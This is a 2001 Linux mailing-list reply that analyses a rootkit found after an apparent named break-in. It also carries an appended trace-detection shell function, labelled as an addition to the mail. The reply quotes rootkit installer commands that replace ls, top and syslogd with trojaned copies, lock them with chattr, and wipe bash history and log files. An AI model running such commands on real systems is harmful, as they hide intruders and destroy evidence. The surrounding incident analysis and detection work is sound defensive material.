[plamo:10200] Re: About suspicious files created while running named
- Subject: [plamo:10200] Re: About suspicious files created while running named
- From: KOJIMA <kojima@xxxxxxxxxxx>
- Date: Sat, 16 Jun 2001 00:58:56 +0900
- Posted: Sat, 16 Jun 2001 00:59:15 +0900
From: Kenyu Kawamoto <kenyu_k@f6.dion.ne.jp>
Subject: [plamo:10198] About suspicious files created while running named
Date: Sat, 16 Jun 2001 00:22:03 +0900
Message-ID: <20010616000326.9C0B.KENYU_K@f6.dion.ne.jp>
> In the newly created /var/named directory there was a file called
> rk.tgz
> and an extracted rk directory.
>
> Inside it there is a util directory, which contains
> clear find netstat sl3y st syslogd top wpe
> du ls show sniffy str.sh sz var.log
> and other suspicious-looking files.
These are almost certainly cracking tools. Most likely a buffer
overflow bug in named was exploited, root permissions were taken, and these
packages were installed, it seems.
>
> for i in {2,3,4,5}
> do
> cp -f S80rpcmap /etc/rc.d/rc$i.d/
> done
Hmm... so having things like /etc/rc.d/rc[1-6].d is a bad idea in this
respect?
> rm -rf /usr/bin/top
> mv -f top /usr/bin/top
> chmod 4555 /usr/bin/top
Around here it seems to replace top so that suspicious processes are not
displayed.
> chattr -i /sbin/syslogd > /dev/null 2>&1
> killall -9 syslogd
> touch -acmr /sbin/syslogd syslogd
> mv -f syslogd /sbin/syslogd
> chmod 4555 /sbin/syslogd
I suppose this is where it replaces syslogd so that suspicious activity is
not logged. And on top of that it runs chattr on it.
> #
> chattr -i /bin/ls > /dev/null 2>&1
> touch -acmr /bin/ls ls
> mv -f ls /bin/ls
> chmod 4555 /bin/ls
This also replaces ls, presumably so that suspicious programs are not
shown.
> chattr -i /bin/netstat > /dev/null 2>&1
> chattr -i /usr/bin/du > /dev/null 2>&1
> chattr +i /usr/bin/top
> chattr +i /bin/netstat
> chattr +i /usr/bin/find
> chattr +i /sbin/syslogd
This part is probably the same: I think it installs commands that have been
modified so that they do not show suspicious processes and the like.
> rm -rf ~/.bash_history /var/log/xferlog* /var/log/secure* /var/log/lastlog*
> echo -e "\n - Gata ! - Have Phun ! - "
And finally it deletes the log records like this to try to destroy the
evidence... They have thought this through quite well.
Buffer overflow bugs in named are a frequent target, so when running named
it is probably safer to compile the latest version yourself.
# plamo-2.2 has bind-8.2.3, but was that one OK? I don't run bind
# myself, so my checking in this area is lax..
-------
Kojima
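
A check for the traces the quoted script leaves behind (setuid bits from `chmod 4555`, immutable flags from `chattr +i`, `S80rpcmap` in rc2.d through rc5.d, and `rk.tgz` / `rk` under /var/named), as an added example that is not part of the original mail. The function name, the output labels and the ROOT argument are assumptions.

```shell
#!/bin/sh
# Added example: look for the traces the quoted install script leaves behind.
# Run it from trusted media against a mounted copy of the disk: the mail notes
# that ls and friends on the compromised host are replaced. It uses only the
# shell's own file tests plus lsattr, so supply a known-good lsattr as well.

# Binaries the quoted script replaces or re-flags (paths taken from the mail).
RK_BINARIES="bin/ls bin/netstat usr/bin/top usr/bin/find usr/bin/du sbin/syslogd"

# scan_rootkit_traces ROOT  (name and output labels are assumptions)
# Prints one finding per line: SETUID, IMMUTABLE, RCSCRIPT or DROPPED + path.
scan_rootkit_traces() {
    root="${1:-/}"
    root="${root%/}"
    for rel in $RK_BINARIES; do
        f="$root/$rel"
        [ -f "$f" ] || continue
        # "chmod 4555" sets the setuid bit; none of these tools ship setuid.
        if [ -u "$f" ]; then
            echo "SETUID $f"
        fi
        # "chattr +i" sets the immutable flag; lsattr shows it as 'i'.
        if command -v lsattr >/dev/null 2>&1; then
            case "$(lsattr -d "$f" 2>/dev/null | cut -d' ' -f1)" in
                *i*) echo "IMMUTABLE $f" ;;
            esac
        fi
    done
    # The script copies S80rpcmap into rc2.d through rc5.d.
    for i in 2 3 4 5; do
        s="$root/etc/rc.d/rc$i.d/S80rpcmap"
        if [ -e "$s" ]; then
            echo "RCSCRIPT $s"
        fi
    done
    # The archive and its extracted directory reported under /var/named.
    for p in var/named/rk.tgz var/named/rk; do
        if [ -e "$root/$p" ]; then
            echo "DROPPED $root/$p"
        fi
    done
    return 0
}
```

Call it as `scan_rootkit_traces /mnt/image` with the suspect filesystem mounted read-only; any output line is a reason to treat the host as compromised and rebuild it.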
- Follow-Ups
  - [plamo:10201] Re: [plamo:10200] bind Version Up to 8.2.4, Tadashi Nakamura
  - [plamo:10204] Re: About suspicious files created while running named, Kenyu Kawamoto
- References
  - [plamo:10198] About suspicious files created while running named, Kenyu Kawamoto